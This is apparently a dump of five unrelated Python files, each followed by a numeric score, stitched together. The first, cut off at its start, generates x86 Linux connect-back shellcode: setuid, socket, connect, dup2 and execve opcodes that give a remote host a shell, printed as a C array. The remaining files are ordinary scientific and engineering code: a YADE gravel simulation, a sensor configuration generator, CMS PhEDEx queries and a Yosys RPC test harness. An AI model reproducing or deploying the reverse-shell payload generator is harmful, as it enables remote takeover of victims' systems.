xrange(cnt): #push binpath shellcode += '\x68' #push opcode shellcode += binpath[i*ALIGN:(i+1)*ALIGN][::-1] #reverse shellcode += '\x89\xe3' #mov ebx,esp #ebx store the first argv for execve #build the second argv for execve shellcode += '\x52' #push edx ---> as null bytes cnt = len(parameters) if cnt: shellcode += '\x83\xec' + pack('B',(cnt*4) + 4) #sub esp,cnt*4 shellcode += '\x89\xe1' #mov ecx, esp ecx= esp #ecx store the second argv for execve for i in xrange(cnt): p = parameters[i][::-1] l = len(p) c = l / 2 r = l % 2 shellcode += '\x52' #push edx ---> as null bytes for j in xrange(c): shellcode += '\x66\xb8' #mov ax shellcode += p[j*2:(j+1)*2][::-1] shellcode += '\x66\x50' #push ax if r: shellcode += '\x31\xc0' #xor eax,eax shellcode += '\xb4' + p[l-1] #mov ah,p[_len-1] shellcode += '\x66\x50' #push ax shellcode += '\x44' #inc esp shellcode += "\x89\xe0" #mov eax,esp shellcode += '\x89\x41' + pack('B',((i+1)*4)) #mov [ecx+(i+1)*4],eax shellcode += '\x89\x19' #mov [ecx],ebx else: shellcode += '\x53' #push ebx shellcode += '\x89\xe1' #mov ecx, esp ecx= esp shellcode += '\x31\xc0' #xor eax,eax shellcode += '\xb0\x0b' #mov al,0x0b # execve call num shellcode += '\xcd\x80' #int 0x80 #call exit() #shellcode += '\x31\xc0\x31\xdb\x40\xcd\x80' return shellcode def connect_back_shellcode(ip,port,binpath,parameters=[]): if (not port & 0xFF) or \ (not port>>8 & 0xFF) : print 'port contains null bytes' exit(0) #sock() shellcode += '\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x6a\x01\x6a\x02\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc6' #connect() shellcode += build_sockaddr_shellcode(ip, port) shellcode += '\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb3\x03\xb0\x66\xcd\x80' #call dup2(sockfd,0) dup2(sockfd,1) dup2(sockfd,2) shellcode += '\x89\xf3\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80' #call execve(binpath,[binpath,arg1,arg2,...],NULL) shellcode += exec_shellcode(binpath,parameters) #call exit() #shellcode += '\x31\xc0\x31\xdb\x40\xcd\x80' return shellcode def getshellcode(language, shellcode): new_shellcode = '' if language == 'bin': new_shellcode = shellcode sys.stdout.write(new_shellcode) if language == 'c': sys.stdout.write("\nchar shellcode[] = \\\n\"") for i in xrange(len(shellcode)): tmp = '\\'+ str(hex(ord(shellcode[i])))[1:] new_shellcode += tmp sys.stdout.write(tmp) if not (i+1) % 16 : sys.stdout.write("\"\n\"") sys.stdout.write("\";\n\n\n") if language == 'perl': pass if language == 'python': pass if __name__ == '__main__': #language = 'bin' language = 'c' shellcode = '' shellcode += init_regs_shellcode() shellcode += setuid_shellcode(UID) shellcode += connect_back_shellcode(ip=IP, port=PORT, binpath=BIN_FILE, parameters=PARAMETERS) out_format(language) getshellcode(language, shellcode)
0.048721
from yade import plot, polyhedra_utils gravel = PolyhedraMat() gravel.density = 2600 #kg/m^3 gravel.Ks = 20000 gravel.Kn = 1E7 #Pa gravel.frictionAngle = 0.5 #rad steel = PolyhedraMat() steel.density = 7850 #kg/m^3 steel.Ks = 10*gravel.Ks steel.Kn = 10*gravel.Kn steel.frictionAngle = 0.4 #rad rubber = PolyhedraMat() rubber.density = 1000 #kg/m^3 rubber.Ks = gravel.Ks/10 rubber.Kn = gravel.Kn/10 rubber.frictionAngle = 0.7 #rad O.bodies.append(polyhedra_utils.polyhedra(gravel,v=((0,0,-0.05),(0.3,0,-0.05),(0.3,0.3,-0.05),(0,0.3,-0.05),(0,0,0),(0.3,0,0),(0.3,0.3,0),(0,0.3,0)),fixed=True, color=(0.35,0.35,0.35))) #O.bodies.append(utils.wall(0,axis=1,sense=1, material = gravel)) #O.bodies.append(utils.wall(0,axis=0,sense=1, material = gravel)) #O.bodies.append(utils.wall(0.3,axis=1,sense=-1, material = gravel)) #O.bodies.append(utils.wall(0.3,axis=0,sense=-1, material = gravel)) polyhedra_utils.fillBox((0,0,0), (0.3,0.3,0.3),gravel,sizemin=[0.025,0.025,0.025],sizemax=[0.05,0.05,0.05],seed=4) def checkUnbalancedI(): print "iter %d, time elapsed %f, time step %.5e, unbalanced forces = %.5f"%(O.iter, O.realtime, O.dt, utils.unbalancedForce()) O.engines=[ ForceResetter(), InsertionSortCollider([Bo1_Polyhedra_Aabb(),Bo1_Wall_Aabb(),Bo1_Facet_Aabb()]), InteractionLoop( [Ig2_Wall_Polyhedra_PolyhedraGeom(), Ig2_Polyhedra_Polyhedra_PolyhedraGeom(), Ig2_Facet_Polyhedra_PolyhedraGeom()], [Ip2_PolyhedraMat_PolyhedraMat_PolyhedraPhys()], # collision "physics" [PolyhedraVolumetricLaw()] # contact law -- apply forces ), #GravityEngine(gravity=(0,0,-9.81)), NewtonIntegrator(damping=0.3,gravity=(0,0,-9.81)), PyRunner(command='checkUnbalancedI()',realPeriod=5,label='checker') ] #O.dt=0.25*polyhedra_utils.PWaveTimeStep() O.dt=0.0025*polyhedra_utils.PWaveTimeStep() from yade import qt qt.Controller() V = qt.View() V.screenSize = (550,450) V.sceneRadius = 1 V.eyePosition = (0.7,0.5,0.1) V.upVector = (0,0,1) V.lookAt = (0.15,0.15,0.1)
0.045319
#!/usr/bin/env python import os #################################################################################################### ### Settings class ################################################################################# #################################################################################################### class settings: def __init__( self ): # file index number self.i_file=0 ## settings # list: values to be set # prio: sequence of the different settings ## # Vbb self.vbb_list=[] self.vbb_prio=[] # Vrst self.vrst_list=[] self.vrst_prio=[] # Vcasn self.vcasn_list=[[]] self.vcasn_prio=[] # Vcasn self.vcasn_list=[] self.vcasn_prio=[] # Ithr self.ithr_list=[] self.ithr_prio=[] # Vlight self.vlight_list=[] self.vlight_prio=[] # Acq_time self.acq_time_list=[] self.acq_time_prio=[] # Trig_delay self.trig_delay_list=[] self.trig_delay_prio=[] def generate_files( self ): for i_vbb in range(len(self.vbb_prio)): vbb_index=self.vbb_prio[i_vbb] vbb=self.vbb_list[vbb_index] for i_vrst in range(len(self.vrst_prio)): vrst=self.vrst_list[self.vrst_prio[i_vrst]] for i_vcasn in range(len(self.vcasn_prio)): vcasn=self.vcasn_list[vbb_index][self.vcasn_prio[i_vcasn]] for i_vcasp in range(len(self.vcasp_prio)): vcasp=self.vcasp_list[self.vcasp_prio[i_vcasp]] for i_ithr in range(len(self.ithr_prio)): ithr=self.ithr_list[self.ithr_prio[i_ithr]] for i_vlight in range(len(self.vlight_prio)): vlight=self.vlight_list[self.vlight_prio[i_vlight]] for i_acq_time in range(len(self.acq_time_list)): acq_time=self.acq_time_list[self.acq_time_prio[i_acq_time]] for i_trig_delay in range(len(self.trig_delay_list)): trig_delay=self.trig_delay_list[self.trig_delay_prio[i_trig_delay]] args =(self.i_file, vbb, vrst, vcasn, vcasp, ithr, vlight, acq_time, trig_delay) cmd ="/bin/bash conf_gen_helper.sh %d %f %f %f %f %f %f %f %f"%args os.system(cmd) self.i_file+=1 #################################################################################################### #################################################################################################### s=settings() #### load the standard settings # Vbb (V) s.vbb_list=[ 0, 0.5, 1, 2, 3, 4, 5, 6 ] s.vbb_prio=[ 0, 3, 2, 4, 1, 5, 6 ] # Vrst (V) s.vrst_list=[ 1.6 ] s.vrst_prio=[ 0 ] # back-bias dependent Vcasn (V) # Vbb: s.vcasn_list=[[ 0.40, 0.50, 0.60 ], # 0.0 V [ 0.60, 0.70, 0.75 ], # 0.5 V [ 0.70, 0.80, 0.90 ], # 1.0 V [ 0.90, 1.05, 1.10 ], # 2.0 V [ 1.00, 1.10, 1.20 ], # 3.0 V [ 1.20, 1.30, 1.40 ], # 4.0 V [ 1.35, 1.40, 1.45 ], # 5.0 V [ 1.40, 1.45, 1.50 ]] # 6.0 V s.vcasn_prio=[ 0, 1, 2 ] # Vcasp (V) s.vcasp_list=[ 0.6 ] s.vcasp_prio=[ 0 ] # Ithr (uA) s.ithr_list=[ 1.02, 1.54, 2.05, 2.87 ] s.ithr_prio=[ 2, 0, 1, 3 ] # Vlight (V) s.vlight_list=[ 0., 10.25 ] s.vlight_prio=[ 0, 1 ] # Acq_time s.acq_time_list=[ 1.54 ] s.acq_time_prio=[ 0 ] # Trig_delay s.trig_delay_list=[ 0. ] s.trig_delay_prio=[ 0 ] ### apply modifications # no light standard s.vlight_prio=[ 0 ] s.acq_time_list=[ 3. ] s.generate_files() # scientific light s.vlight_prio=[ 1 ] s.generate_files() # delay scan s.vlight_prio=[ 0 ] s.vbb_prio=[ 0, 3 ] s.ithr_prio=[ 2, 0 ] s.trig_delay_list=[ 0. ] s.trig_delay_prio=[ 0 ] s.ithr_prio=[ 2, 0 ] s.vcasn_prio=[ 0 ] s.trig_delay_list=[ 1., 2., 3., 4., 5., 6., 7., 8., 9. ] s.trig_delay_prio=[ 0, 1, 2, 3, 4, 5, 6, 7, 8 ] s.generate_files() # delay scan with light s.trig_delay_list=[ 1., 2., 3., 4., 5., 6., 7. ] s.trig_delay_prio=[ 0, 1, 2, 3, 4, 5, 6 ] s.vlight_prio=[ 1 ] s.generate_files() # fine delay scan s.acq_time_list=[ 1.54 ] s.trig_delay_list=[ 0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0, 5.5, 6. ] s.trig_delay_prio=[ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 ] s.generate_files() # fine delay scan without light s.vlight_prio=[ 0 ] s.generate_files() print "%d config files produced" % s.i_file print "Estimated measurement time %d min (%0.1f h) assuming 7.5 min per config file" % (s.i_file*7.5, s.i_file*7.5/60.)
0.035765
#!/usr/bin/env python import sys,getopt,urllib2,json,time year=32000000 # a bit more but good enough ayearago=int(time.time())-year*3 def sites(dataset): sitelist={} # pull block info down from datasvc # if "#" is in the thing its a block, so do different arguments if "#" in dataset: dsQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/blockreplicas?block=' else: dsQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/blockreplicas?dataset=' # use urllib2.quote to settle the # in the block if its there fullQueryUrl=dsQueryUrl+urllib2.quote(dataset) # print fullQueryUrl queryResult=urllib2.urlopen(fullQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) # Now have dict full of stuff dssize=0.0 for block in queryJSON['phedex']['block']: dssize+=block['bytes'] # print block for replica in block['replica']: #print replica['node'] if replica['node'] not in sitelist.keys(): sitelist[replica['node']]=0 # if replica['complete'] == 'y': sitelist[replica['node']] += replica['bytes'] for site in sitelist.keys(): if dssize>0: sitelist[site]=sitelist[site]/dssize return sitelist def replicabytes(dataset): sitelist={} # pull block info down from datasvc # if "#" is in the thing its a block, so do different arguments if "#" in dataset: dsQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/blockreplicas?block=' else: dsQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/blockreplicas?dataset=' # print dataset # use urllib2.quote to settle the # in the block if its there fullQueryUrl=dsQueryUrl+urllib2.quote(dataset) # print fullQueryUrl queryResult=urllib2.urlopen(fullQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) # Now have dict full of stuff replicalist={} dssize=0.0 repsize=0.0 for block in queryJSON['phedex']['block']: dssize+=block['bytes'] for replica in block['replica']: #print replica['node'] if replica['node'] not in replicalist.keys(): replicalist[replica['node']]=0 # if replica['complete'] == 'y': replicalist[replica['node']] += replica['bytes'] return replicalist def blockcompareJSON(siteA,siteB): blocklist={} stQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/blockreplicacompare?' fullQueryUrl=stQueryUrl+'a='+siteA+'&b='+siteB queryResult=urllib2.urlopen(fullQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) return queryJSON def missingfilesJSON(block,site): filelist={} # get missing files for a block at a site stQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/missingfiles?' fullQueryUrl=stQueryUrl+'block='+urllib2.quote(block)+'&node='+site queryResult=urllib2.urlopen(fullQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) return queryJSON def blocksJSON(site): blocklist={} # get blocks living at a site stQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/blockreplicas?node=' fullQueryUrl=stQueryUrl+site queryResult=urllib2.urlopen(fullQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) return queryJSON def allSubscriptions(site="T3_US_FNALLPC",since=ayearago): subslist={} # get all subscriptions since forever from a site stQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/subscriptions?node='+site+'&create_since='+str(since) queryResult=urllib2.urlopen(stQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) return queryJSON def allDeletionRequests(site): dellist={} # pull down all open deletion requests for a site stQueryUrl="https://cmsweb.cern.ch/phedex/datasvc/json/prod/deleterequests?node="+site+"&create_since="+str(ayearago)+"&approval=pending" queryResult=urllib2.urlopen(stQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) return queryJSON if __name__ == '__main__': testsitelist=sites("/MinBias_TuneA2MB_13TeV-pythia8/Fall13-POSTLS162_V1-v1/GEN-SIM") for site in testsitelist.keys(): print "Site: %25s Complete %.1f " % (site,testsitelist[site] * 100.0) testJSON=blocksJSON("T3_US_FNALLPC") print testJSON
0.039648
def modules(): return ["python_inv"] def derive(module, parameters): assert module == r"python_inv" if parameters.keys() != {r"\width"}: raise ValueError("Invalid parameters") return "ilang", r""" module \impl wire width {width:d} input 1 \i wire width {width:d} output 2 \o cell $neg $0 parameter \A_SIGNED 1'0 parameter \A_WIDTH 32'{width:b} parameter \Y_WIDTH 32'{width:b} connect \A \i connect \Y \o end end module \python_inv wire width {width:d} input 1 \i wire width {width:d} output 2 \o cell \impl $0 connect \i \i connect \o \o end end """.format(width=parameters[r"\width"]) # ---------------------------------------------------------------------------- import json import argparse import sys, socket, os, subprocess try: import msvcrt, win32pipe, win32file except ImportError: msvcrt = win32pipe = win32file = None def map_parameter(parameter): if parameter["type"] == "unsigned": return int(parameter["value"], 2) if parameter["type"] == "signed": width = len(parameter["value"]) value = int(parameter["value"], 2) if value & (1 << (width - 1)): value = -((1 << width) - value) return value if parameter["type"] == "string": return parameter["value"] if parameter["type"] == "real": return float(parameter["value"]) def call(input_json): input = json.loads(input_json) if input["method"] == "modules": return json.dumps({"modules": modules()}) if input["method"] == "derive": try: frontend, source = derive(input["module"], {name: map_parameter(value) for name, value in input["parameters"].items()}) return json.dumps({"frontend": frontend, "source": source}) except ValueError as e: return json.dumps({"error": str(e)}) def main(): parser = argparse.ArgumentParser() modes = parser.add_subparsers(dest="mode") mode_stdio = modes.add_parser("stdio") if os.name == "posix": mode_path = modes.add_parser("unix-socket") if os.name == "nt": mode_path = modes.add_parser("named-pipe") mode_path.add_argument("path") args = parser.parse_args() if args.mode == "stdio": while True: input = sys.stdin.readline() if not input: break sys.stdout.write(call(input) + "\n") sys.stdout.flush() if args.mode == "unix-socket": sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) sock.settimeout(30) sock.bind(args.path) try: sock.listen(1) ys_proc = subprocess.Popen(["../../yosys", "-ql", "unix.log", "-p", "connect_rpc -path {}; read_verilog design.v; hierarchy -top top; flatten; select -assert-count 1 t:$neg".format(args.path)]) conn, addr = sock.accept() file = conn.makefile("rw") while True: input = file.readline() if not input: break file.write(call(input) + "\n") file.flush() ys_proc.wait(timeout=10) if ys_proc.returncode: raise subprocess.CalledProcessError(ys_proc.returncode, ys_proc.args) finally: ys_proc.kill() sock.close() os.unlink(args.path) if args.mode == "named-pipe": pipe = win32pipe.CreateNamedPipe(args.path, win32pipe.PIPE_ACCESS_DUPLEX, win32pipe.PIPE_TYPE_BYTE|win32pipe.PIPE_READMODE_BYTE|win32pipe.PIPE_WAIT, 1, 4096, 4096, 0, None) win32pipe.ConnectNamedPipe(pipe, None) try: while True: input = b"" while not input.endswith(b"\n"): result, data = win32file.ReadFile(pipe, 4096) assert result == 0 input += data assert not b"\n" in input or input.endswith(b"\n") output = (call(input.decode("utf-8")) + "\n").encode("utf-8") length = len(output) while length > 0: result, done = win32file.WriteFile(pipe, output) assert result == 0 length -= done except win32file.error as e: if e.args[0] == 109: # ERROR_BROKEN_PIPE pass else: raise if __name__ == "__main__": main()
0.034483